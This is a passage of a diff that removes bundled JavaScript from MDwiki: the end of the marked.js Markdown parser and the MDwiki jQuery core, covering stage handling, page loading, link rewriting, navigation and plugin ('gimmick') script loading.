-    if (!highlight || highlight.length < 3) {
-      return callback(null, Parser.parse(tokens, opt));
-    }
-
-    var done = function() {
-      delete opt.highlight;
-      var out = Parser.parse(tokens, opt);
-      opt.highlight = highlight;
-      return callback(null, out);
-    };
-
-    for (; i < l; i++) {
-      (function(token) {
-        if (token.type !== 'code') return;
-        pending++;
-        return highlight(token.text, token.lang, function(err, code) {
-          if (code == null || code === token.text) {
-            return --pending || done();
-          }
-          token.text = code;
-          token.escaped = true;
-          --pending || done();
-        });
-      })(tokens[i]);
-    }
-
-    return;
-  }
-  try {
-    if (opt) opt = merge({}, marked.defaults, opt);
-    return Parser.parse(Lexer.lex(src, opt), opt);
-  } catch (e) {
-    e.message += '\nPlease report this to https://github.com/chjj/marked.';
-    if ((opt || marked.defaults).silent) {
-      return '<p>An error occured:</p><pre>'
-        + escape(e.message + '', true)
-        + '</pre>';
-    }
-    throw e;
-  }
-}
-
-/**
- * Options
- */
-
-marked.options =
-marked.setOptions = function(opt) {
-  merge(marked.defaults, opt);
-  return marked;
-};
-
-marked.defaults = {
-  gfm: true,
-  tables: true,
-  breaks: false,
-  pedantic: false,
-  sanitize: false,
-  smartLists: false,
-  silent: false,
-  highlight: null,
-  langPrefix: 'lang-'
-};
-
-/**
- * Expose
- */
-
-marked.Parser = Parser;
-marked.parser = Parser.parse;
-
-marked.Lexer = Lexer;
-marked.lexer = Lexer.lex;
-
-marked.InlineLexer = InlineLexer;
-marked.inlineLexer = InlineLexer.output;
-
-marked.parse = marked;
-
-if (typeof exports === 'object') {
-  module.exports = marked;
-} else if (typeof define === 'function' && define.amd) {
-  define(function() { return marked; });
-} else {
-  this.marked = marked;
-}
-
-}).call(function() {
-  return this || (typeof window !== 'undefined' ? window : global);
-}());
-
-(function($) {
-    'use strict';
-
-    // hide the whole page so we dont see the DOM flickering
-    // will be shown upon page load complete or error
-    $('html').addClass('md-hidden-load');
-
-    // register our $.md object
-    $.md = function (method){
-        if ($.md.publicMethods[method]) {
-            return $.md.publicMethods[method].apply(this,
-                Array.prototype.slice.call(arguments, 1)
-            );
-        } else {
-            $.error('Method ' + method + ' does not exist on jquery.md');
-        }
-    };
-    // default config
-    $.md.config = {
-        title:  null,
-        useSideMenu: true,
-        lineBreaks: 'gfm',
-        additionalFooterText: '',
-        anchorCharacter: '&para;',
-        tocAnchor: '[ &uarr; ]'
-    };
-
-
-    $.md.gimmicks = [];
-    $.md.stages = [];
-
-    // the location of the main markdown file we display
-    $.md.mainHref = '';
-
-    // the in-page anchor that is specified after the !
-    $.md.inPageAnchor = '';
-
-
-    $.md.loglevel = {
-        TRACE: 10,
-        DEBUG: 20,
-        INFO: 30,
-        WARN: 40,
-        ERROR: 50,
-        FATAL: 60
-    };
-    // $.md.logThreshold = $.md.loglevel.DEBUG;
-    $.md.logThreshold = $.md.loglevel.WARN;
-
-}(jQuery));
-
-(function($) {
-    'use strict';
-    $.md.getLogger = function() {
-
-        var loglevel = $.md.loglevel;
-
-        var log = function(logtarget) {
-            var self = this;
-            var level = loglevel[logtarget];
-            return function(msg) {
-                if ($.md.logThreshold <= level) {
-                    console.log('[' + logtarget + '] ' + msg);
-                }
-            };
-        };
-
-        var logger = {};
-        logger.trace = log('TRACE');
-        logger.debug = log('DEBUG');
-        logger.info = log('INFO');
-        logger.warn = log('WARN');
-        logger.error = log('ERROR');
-        logger.fatal = log('FATAL');
-
-        return logger;
-    };
-}(jQuery));
-
-(function($) {
-    'use strict';
-    var log = $.md.getLogger();
-
-    $.Stage = function(name) {
-        var self = $.extend($.Deferred(), {});
-        self.name = name;
-        self.events = [];
-        self.started = false;
-
-        self.reset = function() {
-            self.complete = $.Deferred();
-            self.outstanding = [];
-        };
-
-        self.reset();
-
-        self.subscribe = function(fn) {
-            if (self.started) {
-                $.error('Subscribing to stage which already started!');
-            }
-            self.events.push(fn);
-        };
-        self.unsubscribe = function(fn) {
-            self.events.remove(fn);
-        };
-
-        self.executeSubscribedFn = function (fn) {
-            var d = $.Deferred();
-            self.outstanding.push(d);
-
-            // display an error if our done() callback is not called
-            $.md.util.wait(2500).done(function() {
-                if(d.state() !== 'resolved') {
-                    log.fatal('Timeout reached for done callback in stage: ' + self.name +
-                        '. Did you forget a done() call in a .subscribe() ?');
-                    log.fatal('stage ' + name + ' failed running subscribed function: ' + fn );
-                }
-            });
-
-            var done = function() {
-                d.resolve();
-            };
-            fn(done);
-        };
-
-        self.run = function() {
-            self.started = true;
-            $(self.events).each(function (i,fn) {
-                self.executeSubscribedFn(fn);
-            });
-
-            // if no events are in our queue, we resolve immediately
-            if (self.outstanding.length === 0) {
-                self.resolve();
-            }
-
-            // we resolve when all our registered events have completed
-            $.when.apply($, self.outstanding)
-            .done(function() {
-                self.resolve();
-            })
-            .fail(function() {
-                self.resolve();
-            });
-        };
-
-        self.done(function() {
-            log.debug('stage ' + self.name + ' completed successfully.');
-        });
-        self.fail(function() {
-            log.debug('stage ' + self.name + ' completed with errors!');
-        });
-        return self;
-    };
-}(jQuery));
-
-(function($) {
-    'use strict';
-
-    var log = $.md.getLogger();
-
-    function init() {
-        $.md.stages = [
-            $.Stage('init'),
-
-            // loads config, initial markdown and navigation
-            $.Stage('load'),
-
-            // will transform the markdown to html
-            $.Stage('transform'),
-
-            // HTML transformation finished
-            $.Stage('ready'),
-
-            // after we have a polished html skeleton
-            $.Stage('skel_ready'),
-
-            // will bootstrapify the skeleton
-            $.Stage('bootstrap'),
-
-            // before we run any gimmicks
-            $.Stage('pregimmick'),
-
-            // after we have bootstrapified the skeleton
-            $.Stage('gimmick'),
-
-            // postprocess
-            $.Stage('postgimmick'),
-
-            $.Stage('all_ready'),
-
-            // used for integration tests, not intended to use in MDwiki itself
-            $.Stage('final_tests')
-        ];
-
-        $.md.stage = function(name) {
-            var m = $.grep($.md.stages, function(e,i) {
-                return e.name === name;
-            });
-            if (m.length === 0) {
-                $.error('A stage by name ' + name + '  does not exist');
-            } else {
-                return m[0];
-            }
-        };
-    }
-    init();
-
-    function resetStages() {
-        var old_stages = $.md.stages;
-        $.md.stages = [];
-        $(old_stages).each(function(i,e) {
-            $.md.stages.push($.Stage(e.name));
-        });
-    }
-
-    var publicMethods = {};
-    $.md.publicMethods = $.extend ({}, $.md.publicMethods, publicMethods);
-
-    function transformMarkdown (markdown) {
-        var options = {
-            gfm: true,
-            tables: true,
-            breaks: true
-        };
-        if ($.md.config.lineBreaks === 'original')
-            options.breaks = false;
-        else if ($.md.config.lineBreaks === 'gfm')
-            options.breaks = true;
-
-        marked.setOptions(options);
-
-        // get sample markdown
-        var uglyHtml = marked(markdown);
-        return uglyHtml;
-    }
-
-    function registerFetchMarkdown() {
-
-        var md = '';
-
-        $.md.stage('init').subscribe(function(done) {
-            var ajaxReq = {
-                url: $.md.mainHref,
-                dataType: 'text'
-            };
-            $.ajax(ajaxReq).done(function(data) {
-                // TODO do this elsewhere
-                md = data;
-                done();
-            }).fail(function() {
-                var log = $.md.getLogger();
-                log.fatal('Could not get ' + $.md.mainHref);
-                done();
-            });
-        });
-
-        // find baseUrl
-        $.md.stage('transform').subscribe(function(done) {
-            var len = $.md.mainHref.lastIndexOf('/');
-            var baseUrl = $.md.mainHref.substring(0, len+1);
-            $.md.baseUrl = baseUrl;
-            done();
-        });
-
-        $.md.stage('transform').subscribe(function(done) {
-            var uglyHtml = transformMarkdown(md);
-            $('#md-content').html(uglyHtml);
-            md = '';
-            var dfd = $.Deferred();
-            loadExternalIncludes(dfd);
-            dfd.always(function () {
-                done();
-            });
-        });
-    }
-
-    // load [include](/foo/bar.md) external links
-    function loadExternalIncludes(parent_dfd) {
-
-        function findExternalIncludes () {
-            return $('a').filter (function () {
-                var href = $(this).attr('href');
-                var text = $(this).toptext();
-                var isMarkdown = $.md.util.hasMarkdownFileExtension(href);
-                var isInclude = text === 'include';
-                var isPreview = text.startsWith('preview:');
-                return (isInclude || isPreview) && isMarkdown;
-            });
-        }
-
-        function selectPreviewElements ($jqcol, num_elements) {
-            function isTextNode(node) {
-                return node.nodeType === 3;
-            }
-            var count = 0;
-            var elements = [];
-            $jqcol.each(function (i,e) {
-                if (count < num_elements) {
-                    elements.push(e);
-                    if (!isTextNode(e)) count++;
-                }
-            });
-            return $(elements);
-        }
-
-        var external_links = findExternalIncludes ();
-        // continue execution when all external resources are fully loaded
-        var latch = $.md.util.countDownLatch (external_links.length);
-        latch.always (function () {
-            parent_dfd.resolve();
-        });
-
-        external_links.each(function (i,e) {
-            var $el = $(e);
-            var href = $el.attr('href');
-            var text = $el.toptext();
-
-            $.ajax({
-                url: href,
-                dataType: 'text'
-            })
-            .done(function (data) {
-                var $html = $(transformMarkdown(data));
-                if (text.startsWith('preview:')) {
-                    // only insert the selected number of paragraphs; default 3
-                    var num_preview_elements = parseInt(text.substring(8), 10) ||3;
-                    var $preview = selectPreviewElements ($html, num_preview_elements);
-                    $preview.last().append('<a href="' + href +'"> ...read more &#10140;</a>');
-                    $preview.insertBefore($el.parent('p').eq(0));
-                    $el.remove();
-                } else {
-                    $html.insertAfter($el.parents('p'));
-                    $el.remove();
-                }
-            }).always(function () {
-                latch.countDown();
-            });
-        });
-    }
-
-    function isSpecialLink(href) {
-        if (!href) return false;
-
-        if (href.lastIndexOf('data:') >= 0)
-            return true;
-
-        if (href.startsWith('mailto:'))
-            return true;
-
-        if (href.startsWith('file:'))
-            return true;
-
-        if (href.startsWith('ftp:'))
-            return true;
-
-        // TODO capture more special links: every non-http link with : like
-        // torrent:// etc.
-    }
-
-    // modify internal links so we load them through our engine
-    function processPageLinks(domElement, baseUrl) {
-        var html = $(domElement);
-        if (baseUrl === undefined) {
-            baseUrl = '';
-        }
-        // HACK against marked: empty links will have empy href attribute
-        // we remove the href attribute from the a tag
-        html.find('a').not('#md-menu a').filter(function () {
-            var $this = $(this);
-            var attr = $this.attr('href');
-            if (!attr || attr.length === 0)
-                $this.removeAttr('href');
-        });
-
-        html.find('a, img').each(function(i,e) {
-            var link = $(e);
-            // link must be jquery collection
-            var isImage = false;
-            var hrefAttribute = 'href';
-
-            if (!link.attr(hrefAttribute)) {
-                isImage = true;
-                hrefAttribute = 'src';
-            }
-            var href = link.attr(hrefAttribute);
-
-            if (href && href.lastIndexOf ('#!') >= 0)
-                return;
-
-            if (isSpecialLink(href))
-                return;
-
-            if (!isImage && href.startsWith ('#') && !href.startsWith('#!')) {
-                // in-page link
-                link.click(function(ev) {
-                    ev.preventDefault();
-                    $.md.scrollToInPageAnchor (href);
-                });
-            }
-
-            if (! $.md.util.isRelativeUrl(href))
-                return;
-
-            if (isImage && ! $.md.util.isRelativePath(href))
-                return;
-
-            if (!isImage && $.md.util.isGimmickLink(link))
-                return;
-
-            function build_link (url) {
-                if ($.md.util.hasMarkdownFileExtension (url))
-                    return '#!' + url;
-                else
-                    return url;
-            }
-
-            var newHref = baseUrl + href;
-            if (isImage)
-                link.attr(hrefAttribute, newHref);
-            else if ($.md.util.isRelativePath (href))
-                link.attr(hrefAttribute, build_link(newHref));
-            else
-                link.attr(hrefAttribute, build_link(href));
-        });
-    }
-
-    var navMD = '';
-    $.md.NavigationDfd = $.Deferred();
-    var ajaxReq = {
-        url: 'navigation.md',
-        dataType: 'text'
-    };
-    $.ajax(ajaxReq).done(function(data) {
-        navMD = data;
-        $.md.NavigationDfd.resolve();
-    }).fail(function() {
-        $.md.NavigationDfd.reject();
-    });
-
-    function registerBuildNavigation() {
-
-        $.md.stage('init').subscribe(function(done) {
-            $.md.NavigationDfd.done(function() {
-                done();
-            })
-            .fail(function() {
-                done();
-            });
-        });
-
-        $.md.stage('transform').subscribe(function(done) {
-            if (navMD === '') {
-                var log = $.md.getLogger();
-                log.info('no navgiation.md found, not using a navbar');
-                done();
-                return;
-            }
-
-            var navHtml = marked(navMD);
-            // TODO why are <script> tags from navHtml APPENDED to the jqcol?
-            var $h = $('<div>' + navHtml + '</div>');
-
-            // insert <scripts> from navigation.md into the DOM
-            $h.each(function (i,e) {
-                if (e.tagName === 'SCRIPT') {
-                    $('script').first().before(e);
-                }
-            });
-
-            // TODO .html() is evil!!!
-            var $navContent = $h.eq(0);
-            $navContent.find('p').each(function(i,e) {
-                var $el = $(e);
-                $el.replaceWith($el.html());
-            });
-            $('#md-menu').append($navContent.html());
-            done();
-        });
-
-        $.md.stage('bootstrap').subscribe(function(done) {
-            processPageLinks($('#md-menu'));
-            done();
-        });
-
-        $.md.stage('postgimmick').subscribe(function(done) {
-            var num_links = $('#md-menu a').length;
-            var has_header = $('#md-menu .navbar-brand').eq(0).toptext().trim().length > 0;
-            if (!has_header && num_links <= 1)
-                $('#md-menu').hide();
-
-            done();
-        });
-    }
-
-    $.md.ConfigDfd = $.Deferred();
-    $.ajax({url: 'config.json', dataType: 'text'}).done(function(data) {
-        try {
-            var data_json = JSON.parse(data);
-            $.md.config = $.extend($.md.config, data_json);
-            log.info('Found a valid config.json file, using configuration');
-        } catch(err) {
-            log.error('config.json was not JSON parsable: ' + err);
-        }
-        $.md.ConfigDfd.resolve();
-    }).fail(function(err, textStatus) {
-        log.error('unable to retrieve config.json: ' + textStatus);
-        $.md.ConfigDfd.reject();
-    });
-    function registerFetchConfig() {
-
-        $.md.stage('init').subscribe(function(done) {
-            // TODO 404 won't get cached, requesting it every reload is not good
-            // maybe use cookies? or disable re-loading of the page
-            //$.ajax('config.json').done(function(data){
-            $.md.ConfigDfd.done(function(){
-                done();
-            }).fail(function() {
-                var log = $.md.getLogger();
-                log.info('No config.json found, using default settings');
-                done();
-            });
-        });
-    }
-
-    function registerClearContent() {
-
-        $.md.stage('init').subscribe(function(done) {
-            $('#md-all').empty();
-            var skel ='<div id="md-body"><div id="md-title"></div><div id="md-menu">'+
-                '</div><div id="md-content"></div></div>';
-            $('#md-all').prepend($(skel));
-            done();
-        });
-
-    }
-    function loadContent(href) {
-        $.md.mainHref = href;
-
-        registerFetchMarkdown();
-        registerClearContent();
-
-        // find out which link gimmicks we need
-        $.md.stage('ready').subscribe(function(done) {
-            $.md.initializeGimmicks();
-            $.md.registerLinkGimmicks();
-            done();
-        });
-
-        // wire up the load method of the modules
-        $.each($.md.gimmicks, function(i, module) {
-            if (module.load === undefined) {
-                return;
-            }
-            $.md.stage('load').subscribe(function(done) {
-                module.load();
-                done();
-            });
-        });
-
-        $.md.stage('ready').subscribe(function(done) {
-            $.md('createBasicSkeleton');
-            done();
-        });
-
-        $.md.stage('bootstrap').subscribe(function(done){
-            $.mdbootstrap('bootstrapify');
-            processPageLinks($('#md-content'), $.md.baseUrl);
-            done();
-        });
-        runStages();
-    }
-
-    function runStages() {
-
-        // wire the stages up
-        $.md.stage('init').done(function() {
-            $.md.stage('load').run();
-        });
-        $.md.stage('load').done(function() {
-            $.md.stage('transform').run();
-        });
-        $.md.stage('transform').done(function() {
-            $.md.stage('ready').run();
-        });
-        $.md.stage('ready').done(function() {
-            $.md.stage('skel_ready').run();
-        });
-        $.md.stage('skel_ready').done(function() {
-            $.md.stage('bootstrap').run();
-        });
-        $.md.stage('bootstrap').done(function() {
-            $.md.stage('pregimmick').run();
-        });
-        $.md.stage('pregimmick').done(function() {
-            $.md.stage('gimmick').run();
-        });
-        $.md.stage('gimmick').done(function() {
-            $.md.stage('postgimmick').run();
-        });
-        $.md.stage('postgimmick').done(function() {
-            $.md.stage('all_ready').run();
-        });
-        $.md.stage('all_ready').done(function() {
-            $('html').removeClass('md-hidden-load');
-
-            // phantomjs hook when we are done
-            if (typeof window.callPhantom === 'function') {
-                window.callPhantom({});
-            }
-
-            $.md.stage('final_tests').run();
-        });
-        $.md.stage('final_tests').done(function() {
-            // reset the stages for next iteration
-            resetStages();
-
-            // required by dalekjs so we can wait the element to appear
-            $('body').append('<span id="start-tests"></span>');
-            $('#start-tests').hide();
-        });
-
-        // trigger the whole process by runing the init stage
-        $.md.stage('init').run();
-        return;
-    }
-
-    function extractHashData() {
-        // first char is the # or #!
-        var href;
-        if (window.location.hash.startsWith('#!')) {
-            href = window.location.hash.substring(2);
-        } else {
-            href = window.location.hash.substring(1);
-        }
-        href = decodeURIComponent(href);
-
-        // extract possible in-page anchor
-        var ex_pos = href.indexOf('#');
-        if (ex_pos !== -1) {
-            $.md.inPageAnchor = href.substring(ex_pos + 1);
-            $.md.mainHref = href.substring(0, ex_pos);
-        } else {
-            $.md.mainHref = href;
-        }
-    }
-
-    function appendDefaultFilenameToHash () {
-        var newHashString = '';
-        var currentHashString = window.location.hash || '';
-        if (currentHashString === '' ||
-            currentHashString === '#'||
-            currentHashString === '#!')
-        {
-            newHashString = '#!index.md';
-        }
-        else if (currentHashString.startsWith ('#!') &&
-                 currentHashString.endsWith('/')
-                ) {
-            newHashString = currentHashString + 'index.md';
-        }
-        if (newHashString)
-            window.location.hash = newHashString;
-    }
-
-    $(document).ready(function () {
-
-        // stage init stuff
-        registerFetchConfig();
-        registerBuildNavigation();
-        extractHashData();
-
-        appendDefaultFilenameToHash();
-
-        $(window).bind('hashchange', function () {
-            window.location.reload(false);
-        });
-
-        loadContent($.md.mainHref);
-    });
-}(jQuery));
-
-(function($) {
-    var publicMethods = {
-        isRelativeUrl: function(url) {
-            if (url === undefined) {
-                return false;
-            }
-            // if there is :// in it, its considered absolute
-            // else its relative
-            if (url.indexOf('://') === -1) {
-                return true;
-            } else {
-                return false;
-            }
-        },
-        isRelativePath: function(path) {
-            if (path === undefined)
-                return false;
-            if (path.startsWith('/'))
-                return false;
-            return true;
-        },
-        isGimmickLink: function(domAnchor) {
-            if (domAnchor.toptext().indexOf ('gimmick:') !== -1) {
-                return true;
-            } else {
-                return false;
-            }
-        },
-        hasMarkdownFileExtension: function (str) {
-            var markdownExtensions = [ '.md', '.markdown', '.mdown' ];
-            var result = false;
-            var value = str.toLowerCase().split('#')[0];
-            $(markdownExtensions).each(function (i,ext) {
-                if (value.toLowerCase().endsWith (ext)) {
-                    result = true;
-                }
-            });
-            return result;
-        },
-        wait: function(time) {
-            return $.Deferred(function(dfd) {
-                setTimeout(dfd.resolve, time);
-            });
-        }
-    };
-    $.md.util = $.extend ({}, $.md.util, publicMethods);
-
-    if (typeof String.prototype.startsWith !== 'function') {
-        String.prototype.startsWith = function(str) {
-            return this.slice(0, str.length) === str;
-        };
-    }
-    if (typeof String.prototype.endsWith !== 'function') {
-        String.prototype.endsWith = function(str) {
-            return this.slice(this.length - str.length, this.length) === str;
-        };
-    }
-
-    $.fn.extend ({
-        toptext: function () {
-            return this.clone().children().remove().end().text();
-        }
-    });
-
-    // adds a :icontains selector to jQuery that is case insensitive
-    $.expr[':'].icontains = $.expr.createPseudo(function(arg) {
-        return function(elem) {
-            return $(elem).toptext().toUpperCase().indexOf(arg.toUpperCase()) >= 0;
-        };
-    });
-
-    $.md.util.getInpageAnchorText = function (text) {
-        var subhash = text.replace(/ /g, '_');
-        // TODO remove more unwanted characters like ?/,- etc.
-        return subhash;
-
-    };
-    $.md.util.getInpageAnchorHref = function (text, href) {
-        href = href || $.md.mainHref;
-        var subhash = $.md.util.getInpageAnchorText(text);
-        return '#!' + href + '#' + subhash;
-    };
-
-    $.md.util.repeatUntil = function (interval, predicate, maxRepeats) {
-        maxRepeats = maxRepeats || 10;
-        var dfd = $.Deferred();
-        function recursive_repeat (interval, predicate, maxRepeats) {
-            if (maxRepeats === 0) {
-                dfd.reject();
-                return;
-            }
-            if (predicate()) {
-                dfd.resolve();
-                return;
-            } else {
-                $.md.util.wait(interval).always(function () {
-                    recursive_repeat(interval, predicate, maxRepeats - 1);
-                });
-            }
-        }
-        recursive_repeat(interval, predicate, maxRepeats);
-        return dfd;
-    };
-
-    // a count-down latch as in Java7.
-    $.md.util.countDownLatch = function (capacity, min) {
-        min = min || 0;
-        var dfd = $.Deferred();
-        if (capacity <= min) dfd.resolve();
-        dfd.capacity = capacity;
-        dfd.countDown = function () {
-            dfd.capacity--;
-            if (dfd.capacity <= min)
-                dfd.resolve();
-        };
-        return dfd;
-    };
-
-}(jQuery));
-
-(function($) {
-    'use strict';
-
-    // PUBLIC API
-    $.md.registerGimmick = function(module) {
-        $.md.gimmicks.push(module);
-        return;
-    };
-
-    // registers a script for a gimmick, that is later dynamically loaded
-    // by the core.
-    // src may be an URL or direct javascript sourcecode. When options.callback
-    // is provided, the done() function is passed to the function and needs to
-    // be called.
-    $.md.registerScript = function(module, src, options) {
-        var scriptinfo = new ScriptInfo({
-            module: module,
-            src: src,
-            options: options
-        });
-        registeredScripts.push(scriptinfo);
-    };
-
-    // same as registerScript but for css. Note that we do not provide a
-    // callback when the load finishes
-    $.md.registerCss = function(module, url, options) {
-        var license = options.license,
-            stage = options.stage || 'skel_ready',
-            callback = options.callback;
-
-        checkLicense(license, module);
-        var tag = '<link rel="stylesheet" href="' + url + '" type="text/css"></link>';
-        $.md.stage(stage).subscribe(function(done) {
-            $('head').append(tag);
-            if (callback !== undefined) {
-                callback(done);
-            } else {
-                done();
-            }
-        });
-    };
-
-    // turns hostname/path links into http://hostname/path links
-    // we need to do this because if accessed by file:///, we need a different
-    // transport scheme for external resources (like http://)
-    $.md.prepareLink = function(link, options) {
-        options = options || {};
-        var ownProtocol = window.location.protocol;
-
-        if (options.forceSSL)
-            return 'https://' + link;
-        if (options.forceHTTP)
-            return 'http://' + link;
-
-        if (ownProtocol === 'file:') {
-            return 'http://' + link;
-        }
-        // default: use the same as origin resource
-        return '//' + link;
-    };
-
-    // associate a link trigger for a gimmick. i.e. [gimmick:foo]() then
-    // foo is the trigger and will invoke the corresponding gimmick
-    $.md.linkGimmick = function(module, trigger, callback, stage) {
-        if (stage === undefined) {
-            stage = 'gimmick';
-        }
-        var linktrigger = new LinkTrigger({
-            trigger: trigger,
-            module: module,
-            stage: stage,
-            callback: callback
-        });
-        linkTriggers.push(linktrigger);
-    };
-
-    $.md.triggerIsActive = function(trigger) {
-        if (activeLinkTriggers.indexOf(trigger) === -1) {
-            return false;
-        } else {
-            return true;
-        }
-    };
-
-    var initialized = false;
-    // TODO combine main.js and modules.js closure
-    $.md.initializeGimmicks = function() {
-        findActiveLinkTrigger();
-        runGimmicksOnce();
-        loadRequiredScripts();
-    };
-
-    // END PUBLIC API
-
-
-    var log = $.md.getLogger();
-
-    // triggers that we actually found on the page
-    // array of string
-    var activeLinkTriggers = [];
-
-
-    // array of ScriptInfo
-    var registeredScripts = [];
-    function ScriptInfo(initial) {
-        this.module = undefined;
-        this.options = {};
-
-        // can ba an URL or javascript sourcecode
-        this.src = '';
-
-        $.extend(this, initial);
-    }
-
-    // array of linkTriggers
-    var linkTriggers = [];
-    function LinkTrigger(initial) {
-        this.trigger = undefined;
-        this.module = undefined;
-        this.callback = undefined;
-
-        $.extend(this, initial);
-    }
-
-    // jQuery does some magic when inserting inline scripts, so better
-    // use vanilla JS. See:
-    // http://stackoverflow.com/questions/610995/jquery-cant-append-script-element
-    function insertInlineScript(src) {
-        // scripts always need to go directly into the DOM
-        var script = document.createElement('script');
-        script.type = 'text/javascript';
-        script.text = src;
-        document.body.appendChild(script);
-    }
-
-    // since we are GPL, we have to be cautious what other scripts we load
-    // as delivering to the browser is considered delivering a derived work
-    var licenses = ['MIT', 'BSD', 'GPL', 'GPL2', 'GPL3', 'LGPL', 'LGPL2',
-        'APACHE2', 'PUBLICDOMAIN', 'EXCEPTION', 'OTHER'
-    ];
-    function checkLicense(license, module) {
-        if ($.inArray(license, licenses) === -1) {
-            var availLicenses = JSON.stringify(licenses);
-            log.warn('license ' + license + ' is not known.');
-            log.warn('Known licenses:' + availLicenses);
-
-        } else if (license === 'OTHER') {
-            log.warn('WARNING: Module ' + module.name + ' uses a script'+
-                ' with unknown license. This may be a GPL license violation if'+
-                ' this website is publically available!');
-        }
-    }
-
-    // will actually schedule the script load into the DOM.
-    function loadScript(scriptinfo) {
-
-        var module = scriptinfo.module,
-            src = scriptinfo.src,
-            options = scriptinfo.options;
-
-        var license = options.license || 'OTHER',
-            loadstage = options.loadstage || 'skel_ready',
-            finishstage = options.finishstage || 'pregimmick',
-            callback = options.callback;
-
-        var loadDone = $.Deferred();
-
-        checkLicense(license, module);
-        // start script loading
-        log.debug('subscribing ' + module.name + ' to start: ' + loadstage + ' end in: ' + finishstage);
-        $.md.stage(loadstage).subscribe(function(done) {
-            if (src.startsWith('//') || src.startsWith('http')) {
-                $.getScript(src, function() {
-                    if (callback !== undefined) {
-                        callback(done);
-                    } else {
-                        log.debug('module' + module.name + ' script load done: ' + src);
-                        done();
-                    }
-                    loadDone.resolve();
-                });
-            } else {
-                // inline script that we directly insert
-                insertInlineScript(src);
-                log.debug('module' + module.name + ' script inject done');
-                loadDone.resolve();
-                done();
-            }
-        });
-        // if loading is not yet finished in stage finishstage, wait
-        // for the loading to complete
-        $.md.stage(finishstage).subscribe(function(done) {
-            loadDone.done(function() {
-                done();
-            });
-        });
-    }
-
-    // finds out that kind of trigger words are acutally used on a given page
-    // this is most likely a very small subset of all available gimmicks
-    function findActiveLinkTrigger() {
-        var $gimmicks = $('a:icontains(gimmick:)');
-        $gimmicks.each(function(i,e) {
-            var parts = getGimmickLinkParts($(e));
-            if (activeLinkTriggers.indexOf(parts.trigger) === -1) {
-                activeLinkTriggers.push(parts.trigger);
-            }
-        });
-        log.debug('Scanning for required gimmick links: ' + JSON.stringify(activeLinkTriggers));
-    }
-
-    function loadRequiredScripts() {
-        // find each module responsible for the link trigger
-        $.each(activeLinkTriggers, function(i,trigger) {
-            var module = findModuleByTrigger(trigger);
-            if (module === undefined) {
-                log.error('Gimmick link: "' + trigger + '" found but no suitable gimmick loaded');
-                return;
-            }
-            var scriptinfo = registeredScripts.filter(function(info) {
-                return info.module.name === module.name;
-            })[0];
-            // register to load the script
-            if (scriptinfo !== undefined) {
-                loadScript(scriptinfo);
-            }
-        });
-    }
-
-    function findModuleByTrigger(trigger) {
-        var ret;
-        $.each(linkTriggers, function(i,e) {
-            if (e.trigger === trigger) {
-                ret = e.module;
-            }
-        });
-        return ret;
-    }
-
-    function getGimmickLinkParts($link) {
-        var link_text = $.trim($link.toptext());
-        // returns linkTrigger, options, linkText
-        if (link_text.match(/gimmick:/i) === null) {
-            return null;
-        }
-        var href = $.trim($link.attr('href'));
-        var r = new RegExp(/gimmick:\s*([^(\s]*)\s*(\(\s*{?(.*)\s*}?\s*\))*/i);
-        var matches = r.exec(link_text);
-        if (matches === null || matches[1] === undefined) {
-            $.error('Error matching a gimmick: ' + link_text);
-            return null;
-        }
-        var trigger = matches[1].toLowerCase();
-        var args = null;
-        // getting the parameters
-        if (matches[2] !== undefined) {
-            // remove whitespaces
-            var params = $.trim(matches[3].toString());
-            // remove the closing } if present
-            if (params.charAt (params.length - 1) === '}') {
-                params = params.substring(0, params.length - 1);
-            }
-            // add surrounding braces and paranthese
-            params = '({' + params + '})';
-            // replace any single quotes by double quotes
-            params = params.replace(/'/g, '"');
-            // finally, try if the json object is valid
-            try {
-                /*jshint -W061 */
-                args = eval(params);
-            } catch (err) {
-                log.error('error parsing argument of gimmick: ' + link_text + 'giving error: ' + err);
-            }
-        }
-        return { trigger: trigger, options: args, href: href };
-    }
-
-    function runGimmicksOnce() {
-        // runs the once: callback for each gimmick within the init stage
-        $.each($.md.gimmicks, function(i, module) {
-            if (module.once === undefined) {
-                return;
-            }
-            module.once();
-        });
-    }
-
-    // activate all gimmicks on a page, that are contain the text gimmick:
-    // TODO make private / merge closures
-    $.md.registerLinkGimmicks = function () {
-        var $gimmick_links = $('a:icontains(gimmick:)');
-        $gimmick_links.each(function(i, e) {
-            var $link = $(e);
-            var gimmick_arguments = getGimmickLinkParts($link);
-
-            $.each(linkTriggers, function(i, linktrigger) {
-                if (gimmick_arguments.trigger === linktrigger.trigger) {
-                    subscribeLinkTrigger($link, gimmick_arguments, linktrigger);
-                }
-            });
-        });
-    };
-
-    function subscribeLinkTrigger($link, args, linktrigger) {
-        log.debug('Subscribing gimmick ' + linktrigger.module.name + ' to stage: ' + linktrigger.stage);
-
-        $.md.stage(linktrigger.stage).subscribe(function(done) {
-            args.options = args.options ||{};
-
-            // it is possible that broken modules or any other transformation removed the $link
-            // from the dom in the meantime
-            if (!jQuery.contains(document.documentElement, $link[0])) {
-                log.error ('LINK IS NOT IN THE DOM ANYMORE: ');
-                console.log($link);
-            }
-
-            log.debug('Running gimmick ' + linktrigger.module.name);
-            linktrigger.callback($link, args.options, args.href, done);
-
-            // if the gimmick didn't call done, we trigger it here
-            done();
-        });
-    }
-}(jQuery));
-
-(function($) {
-    var publicMethods = {
-        createBasicSkeleton: function() {
-
-            setPageTitle();
-            wrapParagraphText();
-            linkImagesToSelf();
-            groupImages();
-            removeBreaks();
-            addInpageAnchors ();
-
-            $.md.stage('all_ready').subscribe(function(done) {
-                if ($.md.inPageAnchor !== '') {
-                    $.md.util.wait(500).then(function () {
-                        $.md.scrollToInPageAnchor($.md.inPageAnchor);
-                    });
-                }
-                done();
-            });
-            return;
-
-        }
-    };
-    $.md.publicMethods = $.extend ({}, $.md.publicMethods, publicMethods);
-
-    // set the page title to the browser document title, optionally picking
-    // the first h1 element as title if no title is given
-    function setPageTitle() {
-        var $pageTitle;
-        if ($.md.config.title)
-            $('title').text($.md.config.title);
-
-        $pageTitle = $('#md-content h1').eq(0);
-        if ($.trim($pageTitle.toptext()).length > 0) {
-            $('#md-title').prepend($pageTitle);
-            var title = $pageTitle.toptext();
-            // document.title = title;
-        } else {
-            $('#md-title').remove();
-        }
-    }
-    function wrapParagraphText () {
-        // TODO is this true for marked.js?
-
-        // markdown gives us sometime paragraph that contain child tags (like img),
-        // but the containing text is not wrapped. Make sure to wrap the text in the
-        // paragraph into a <div>
-
-		// this also moves ANY child tags to the front of the paragraph!
-		$('#md-content p').each (function () {
-			var $p = $(this);
-			// nothing to do for paragraphs without text
